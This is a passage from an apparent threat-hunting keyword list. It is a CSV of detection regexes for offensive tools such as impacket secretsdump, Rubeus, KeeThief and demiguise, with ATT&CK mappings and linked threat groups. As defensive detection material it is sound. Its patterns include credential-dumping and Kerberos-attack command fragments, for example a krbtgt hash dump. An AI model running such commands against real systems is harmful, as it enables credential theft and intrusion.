john_mpi_wait*",".{0,1000}\sjohn_mpi_wait.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1813" "* john_omp_fallback*",".{0,1000}\sjohn_omp_fallback.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1814" "* john_omp_init*",".{0,1000}\sjohn_omp_init.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1815" "* john_omp_maybe_adjust_or_fallback*",".{0,1000}\sjohn_omp_maybe_adjust_or_fallback.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1816" "* john_omp_show_info*",".{0,1000}\sjohn_omp_show_info.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1817" "* john_register_all*",".{0,1000}\sjohn_register_all.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced 
offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1818" "* john_register_one*",".{0,1000}\sjohn_register_one.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1819" "* john_run*",".{0,1000}\sjohn_run.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1820" "* john_set_mpi*",".{0,1000}\sjohn_set_mpi.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1821" "* john_set_tristates*",".{0,1000}\sjohn_set_tristates.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1822" "* john_the_ripper_cracker.py*",".{0,1000}\sjohn_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","1823" "* john_wait*",".{0,1000}\sjohn_wait.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1824" "* JohnTheRipper/*",".{0,1000}\sJohnTheRipper\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1825" "* JspShell ua*",".{0,1000}\sJspShell\sua.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1828" "* JuicyPotatoNG*",".{0,1000}\sJuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege 
Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","1829" "* JumpSession.x64.o*",".{0,1000}\sJumpSession\.x64\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","1830" "* JumpSession.x86.o*",".{0,1000}\sJumpSession\.x86\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","1831" "* -just-dc-ntlm *",".{0,1000}\s\-just\-dc\-ntlm\s\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1832" "* -just-dc-ntlm *",".{0,1000}\s\-just\-dc\-ntlm\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1833" "* -just-dc-ntlm -just-dc-user krbtgt *",".{0,1000}\s\-just\-dc\-ntlm\s\-just\-dc\-user\skrbtgt\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","1834" "* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1835" "* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1836" "* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*",".{0,1000}\s\-just\-dc\-user\s\'krbtgt\'\s\-dc\-ip\s\s.{0,1000}\s\-k\s\-no\-pass\s\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1837" "* -k * -c *.exe* -p Outlook.Application -o *.hta*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}\.exe.{0,1000}\s\-p\sOutlook\.Application\s\-o\s.{0,1000}\.hta.{0,1000}","offensive_tool_keyword","demiguise","The aim 
of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","1838" "* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}\s\-o\s.{0,1000}\.hta\s\-p\sShellBrowserWindow.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","1839" "* -k --kerberoast*",".{0,1000}\s\-k\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","1840" "* -k -request-user * -dc-ip*",".{0,1000}\s\-k\s\-request\-user\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1841" "* k8gege520 *",".{0,1000}\sk8gege520\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1842" "* kali-install.sh*",".{0,1000}\skali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","1843" "* 
kalilinux/kali-rolling*",".{0,1000}\skalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1844" "* KaynInject.h*",".{0,1000}\sKaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","1845" "* KaynStrike.cna*",".{0,1000}\sKaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","1846" "* kdbof.cpp*",".{0,1000}\skdbof\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","1847" "* keepass /unprotect*",".{0,1000}\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI 
functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","1848" "* keepass backdoor persistence*",".{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","1849" "* Keepass persistence backdoor *",".{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","1850" "* KeePwn.py*",".{0,1000}\sKeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","1851" "* KeeTheft.exe*",".{0,1000}\sKeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","1852" "* KeeThief.ps1*",".{0,1000}\sKeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the 
KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","1853" "* kekeo/modules/kull_m_memory.c*",".{0,1000}\skekeo\/modules\/kull_m_memory\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","1854" "* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1855" "* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1856" "* kerberoast /spn:*",".{0,1000}\skerberoast\s\/spn\:.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","1857" "* Kerberoastable -action list*",".{0,1000}\sKerberoastable\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","1858" "* Kerberoastable -action write -target *",".{0,1000}\sKerberoastable\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","1859" "* Kerberoastables.txt*",".{0,1000}\sKerberoastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - 
T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1860" "* --kerberoasting *",".{0,1000}\s\-\-kerberoasting\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1861" "* --kerberoasting*",".{0,1000}\s\-\-kerberoasting.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1862" "* kerberos asreproast *",".{0,1000}\skerberos\sasreproast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1863" "* kerberos brute * -d *",".{0,1000}\skerberos\sbrute\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 